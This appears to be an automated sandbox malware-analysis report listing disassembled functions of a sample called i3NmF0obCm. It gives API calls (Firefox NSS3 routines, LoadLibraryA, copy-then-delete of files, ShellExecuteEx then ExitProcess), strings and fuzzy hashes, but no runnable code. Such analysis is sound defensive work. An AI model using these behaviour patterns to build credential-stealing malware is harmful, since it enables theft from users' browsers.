free.MOZGLUE(?), ref: 6C70AE14
DeleteCriticalSection.KERNEL32(6C70A6D8), ref: 6C70AE36
free.MOZGLUE(?), ref: 6C70AE3D
free.MOZGLUE(00000000,00000000,?,?,6C70A6D8), ref: 6C70AE47

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 4c057f2d869049a3ca1ea497726682f4916043f55d4ec9353fe81408e11e7ed2
Instruction ID: 4d4278530fcf3f2efd5aefe18d898be81aae5c6d5d3e8a5e68d9aa0b9f3a9ce5
Opcode Fuzzy Hash: 4c057f2d869049a3ca1ea497726682f4916043f55d4ec9353fe81408e11e7ed2
Instruction Fuzzy Hash: 2BF096B5301A01A7CA10AF68D90995777BCBF867BAB14433DE52A83940D731E119C7D5

Function 00EF9DC7 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00EF9DD3

Part of subcall function 00EF934C: __getptd_noexit.LIBCMT ref: 00EF934F
Part of subcall function 00EF934C: __amsg_exit.LIBCMT ref: 00EF935C

__getptd.LIBCMT ref: 00EF9DEA
__amsg_exit.LIBCMT ref: 00EF9DF8
__lock.LIBCMT ref: 00EF9E08
__updatetlocinfoEx_nolock.LIBCMT ref: 00EF9E1C

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 487d97647e8b031b7946574bd10c88aa96264a077777fd11dafac25f7f7e5539
Instruction ID: 343fcbfb72bd5cdbaac48ce179cb0f9b2c96ac51281762d6ebc5edcd509da5e9
Opcode Fuzzy Hash: 487d97647e8b031b7946574bd10c88aa96264a077777fd11dafac25f7f7e5539
Instruction Fuzzy Hash: 6FF09032A0161CDBDB21BBB89D0377D36D0AF00B28F256209F385B62D3CF2459409A66

Function 00EE63C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 154libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00EE683A), ref: 00EE6429

Strings

:h, xrefs: 00EE63CD, 00EE63D9, 00EE63EC, 00EE63F5, 00EE6419, 00EE6442, 00EE6445, 00EE64FB, 00EE650D, 00EE6519, 00EE6522, 00EE659F, 00EE6555, 00EE645A, 00EE647D, 00EE6489, 00EE64B1, 00EE64DD, 00EE64EF, 00EE64BD, 00EE64CA, 00EE6466
:h, xrefs: 00EE6534, 00EE65C2, 00EE65C7, 00EE6571

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: :h$:h
API String ID: 1029625771-897880209
Opcode ID: bf5cf2d0abc98fb1fdcb0e5f753cabde5da3183029d25bec1459a5abc601fdba
Instruction ID: c2d1b612b121952faf167d6f73bafabc98e0bed985026c6bdef31f98139aab05
Opcode Fuzzy Hash: bf5cf2d0abc98fb1fdcb0e5f753cabde5da3183029d25bec1459a5abc601fdba
Instruction Fuzzy Hash: 5071EA74A00249DFCB04CF49C494BEAB7B2FF98348F249568E8096F395C735AD85CB90

Function 6C586C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C586D36

Strings

database corruption, xrefs: 6C586D2A
%s at line %d of [%.10s], xrefs: 6C586D2F
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C586D20

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 4bcb41de1261ccdf0cb0c8619bca4201d956de9960a3b99290770ec8032a164b
Instruction ID: 262b224e2433bb679390e4d4416b68c5fe65483c4463776c9a2a0996f205b78b
Opcode Fuzzy Hash: 4bcb41de1261ccdf0cb0c8619bca4201d956de9960a3b99290770ec8032a164b
Instruction Fuzzy Hash: A8210230616314DBC720CE19CC41B5AB7F6AF80308F148928D8499BF51EB71F98487A2

Function 00EF4560 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00EF4593

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

ShellExecuteEx.SHELL32(0000003C), ref: 00EF4656
ExitProcess.KERNEL32 ref: 00EF4685

Strings

<, xrefs: 00EF4609

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 56d55fda83b384e4a01bacd964496586adedc41d24fc1b58795bc70909ecc19e
Instruction ID: 0dfb596e613f47f919c576e4e85aa24aa95638de6d569f7d0aba609a86954777
Opcode Fuzzy Hash: 56d55fda83b384e4a01bacd964496586adedc41d24fc1b58795bc70909ecc19e
Instruction Fuzzy Hash: 0C313CB1C012089BDB59EF60D995BEEB7B8AF04300F405199F305B6191DF746B88CF69

Function 6C662FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+fl,6C6632C2,<+fl,00000000,00000000,?), ref: 6C662FDA

Part of subcall function 6C6514C0: TlsGetValue.KERNEL32 ref: 6C6514E0
Part of subcall function 6C6514C0: EnterCriticalSection.KERNEL32 ref: 6C6514F5
Part of subcall function 6C6514C0: PR_Unlock.NSS3 ref: 6C65150D

PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C66300B

Part of subcall function 6C6510C0: TlsGetValue.KERNEL32(?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C6510F3
Part of subcall function 6C6510C0: EnterCriticalSection.KERNEL32(?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C65110C
Part of subcall function 6C6510C0: PL_ArenaAllocate.NSS3(?,?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C651141
Part of subcall function 6C6510C0: PR_Unlock.NSS3(?,?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C651182
Part of subcall function 6C6510C0: TlsGetValue.KERNEL32(?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C65119C

SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C66302A

Part of subcall function 6C650840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6508B4

Part of subcall function 6C63C3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6C63C45D
Part of subcall function 6C63C3D0: TlsGetValue.KERNEL32 ref: 6C63C494
Part of subcall function 6C63C3D0: EnterCriticalSection.KERNEL32(?), ref: 6C63C4A9
Part of subcall function 6C63C3D0: PR_Unlock.NSS3(?), ref: 6C63C4F4

Strings

<+fl, xrefs: 6C662FD0

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
String ID: <+fl
API String ID: 2538134263-3624063062
Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction ID: 627efcebed415db3ed117231e0ed749ae04e5bb879a5955892055f8ff71ecb5e
Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction Fuzzy Hash: 2711A7B6B001046BDB008E65DC01A9B77D99F8576CF284134F91CD7B81E772ED19C7A5

Function 6C6BCC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C6BCD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C6BCC7B), ref: 6C6BCD7A
Part of subcall function 6C6BCD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C6BCD8E
Part of subcall function 6C6BCD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C6BCDA5
Part of subcall function 6C6BCD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C6BCDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C6BCCB5
memcpy.VCRUNTIME140(6C7514F4,6C7502AC,00000090), ref: 6C6BCCD3
memcpy.VCRUNTIME140(6C751588,6C7502AC,00000090), ref: 6C6BCD2B

Part of subcall function 6C5D9AC0: socket.WSOCK32(?,00000017,6C5D99BE), ref: 6C5D9AE6
Part of subcall function 6C5D9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C5D99BE), ref: 6C5D9AFC

Part of subcall function 6C5E0590: closesocket.WSOCK32(6C5D9A8F,?,?,6C5D9A8F,00000000), ref: 6C5E0597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6C6BCCB0

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: 50dfae62cd0e316e8cc59c6e143f23ff454c6a6b36d429cdce4ab59af8ee71da
Instruction ID: 12906f17d3def431ae021d18757ccd813c00c070251c9ca7a56511c65ac75a1b
Opcode Fuzzy Hash: 50dfae62cd0e316e8cc59c6e143f23ff454c6a6b36d429cdce4ab59af8ee71da
Instruction Fuzzy Hash: A811B6F2B00240AFEB009F698E07B423AF8939631AF941139F51ADBB45EF71D9148BD5

Function 6C608850 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C610715), ref: 6C608859
PR_NewLock.NSS3 ref: 6C608874

Part of subcall function 6C6B98D0: calloc.MOZGLUE(00000001,00000084,6C5E0936,00000001,?,6C5E102C), ref: 6C6B98E5

PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C60888D

Strings

NSS, xrefs: 6C608887

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: calloc$ArenaInitLockPool
String ID: NSS
API String ID: 2230817933-3870390017
Opcode ID: 60f8173307d9a1f48b5e174d2fdccea276ae02c4dfbfc4c5b1f51d8ca1937d46
Instruction ID: 73418ec0d14118305afd3aee1ea1b432376245342fbdfb3363d36378968f363b
Opcode Fuzzy Hash: 60f8173307d9a1f48b5e174d2fdccea276ae02c4dfbfc4c5b1f51d8ca1937d46
Instruction Fuzzy Hash: B8F0F662F8162023F21062686E06B862598AF5675EF044036E90CB3B82EA51D51883FE

Function 00EF6C60 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00EF742E,00000000), ref: 00EF6C6B
HeapAlloc.KERNEL32(00000000,?,?,00EF742E,00000000), ref: 00EF6C72
wsprintfW.USER32 ref: 00EF6C88

Strings

%hs, xrefs: 00EF6C7F

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: e78c5208eb4cf167c55c82069aa2a07492180313cfd73105133d157a5bd95938
Instruction ID: 9b97520b1563c80750811953fc4b19eb849c2daea1ebd71e9ab442711b1e101d
Opcode Fuzzy Hash: e78c5208eb4cf167c55c82069aa2a07492180313cfd73105133d157a5bd95938
Instruction Fuzzy Hash: 34E0E675E40308BFD754DBD4D80AE6D777CEB04701F000164F90997244DAB15E509B96

Function 00EECB80 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

Part of subcall function 00EF6A70: GetSystemTime.KERNEL32(?,01324BF8,00EFE129,?,?,?,?,?,?,?,?,?,00EE4643,?,00000014), ref: 00EF6A96

Part of subcall function 00EF8740: lstrcpy.KERNEL32(00000000,?), ref: 00EF8792
Part of subcall function 00EF8740: lstrcat.KERNEL32(00000000), ref: 00EF87A2

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EECC01
lstrlen.KERNEL32(00000000), ref: 00EECE18
lstrlen.KERNEL32(00000000), ref: 00EECE2C
DeleteFileA.KERNEL32(00000000), ref: 00EECEA5

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 74bbeef2c597add7fe40ea1d5d231a8f805bd6153c4f3c9742b5e9b3b34c9564
Instruction ID: 0d3a063db0f3c1fd5911c646c3290e064a10a7e88540aadedd608637f8314c3f
Opcode Fuzzy Hash: 74bbeef2c597add7fe40ea1d5d231a8f805bd6153c4f3c9742b5e9b3b34c9564
Instruction Fuzzy Hash: 9E910F7291011C9BCF19FBA0DD96EFEB379AF14300F5091A9F216B2091EF746A48CB65

Function 6C6B4FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C5985D2,00000000,?,?), ref: 6C6B4FFD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6B500C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6B50C8
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6B50D6

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction ID: 371b7a233e63da3a65c7560e0d5e891cb9f0ed99e0c8fdd9fb158ac560ea352f
Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction Fuzzy Hash: 17417FB2A002158FCB18CF18DCD179AB7E1BF4831871D4669D84ADBB02E375E891CB95

Function 6C640420 Relevance: 6.1, APIs: 4, Instructions: 117memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000000,?,6C62C97F,?,?,?), ref: 6C6404BF
TlsGetValue.KERNEL32(00000000,?,6C62C97F,?,?,?), ref: 6C6404F4
EnterCriticalSection.KERNEL32(?,?,?,6C62C97F,?,?,?), ref: 6C64050D
PR_Unlock.NSS3(?,?,?,?,6C62C97F,?,?,?), ref: 6C640556

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Alloc_CriticalEnterSectionUnlockUtilValue
String ID:
API String ID: 349578545-0
Opcode ID: e33a56b71bd1adb431ba988d8c79c2a6f88f69ec94924a0db22e5ab0a9514469
Instruction ID: 27986fafda129cf057fc194e6e9c757d4de92e9988d235a6be7116b75f3b3050
Opcode Fuzzy Hash: e33a56b71bd1adb431ba988d8c79c2a6f88f69ec94924a0db22e5ab0a9514469
Instruction Fuzzy Hash: 43414BB4A05652DFDB08DF29C580669BBF4FF58318F14C56DD8998BB11EB30E891CB84

Function 6C70A860 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 6C70A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6C70A662), ref: 6C70A69E
Part of subcall function 6C70A690: PR_NewCondVar.NSS3(?), ref: 6C70A6B4

PR_IntervalNow.NSS3 ref: 6C70A8C6
EnterCriticalSection.KERNEL32(?), ref: 6C70A8EB
_PR_MD_UNLOCK.NSS3(?), ref: 6C70A944
PR_SetPollableEvent.NSS3(?), ref: 6C70A94F

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
String ID:
API String ID: 811965633-0
Opcode ID: d4a8b8d0f432e36372904f7ec16a51a20ae6094722f92a73c1e82a0f88ae654b
Instruction ID: 610488fff2985873d86d4d5b75232d3e847688749f48aca1ed5cd11e25c63086
Opcode Fuzzy Hash: d4a8b8d0f432e36372904f7ec16a51a20ae6094722f92a73c1e82a0f88ae654b
Instruction Fuzzy Hash: 064149F4B01A029FC704CF29C680956FBF5FF59328B25856AD449CBB11E731E850CB90

Function 6C5F6C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C5F6C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C5F6CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C5F6CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C718FE0), ref: 6C5F6CFE

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
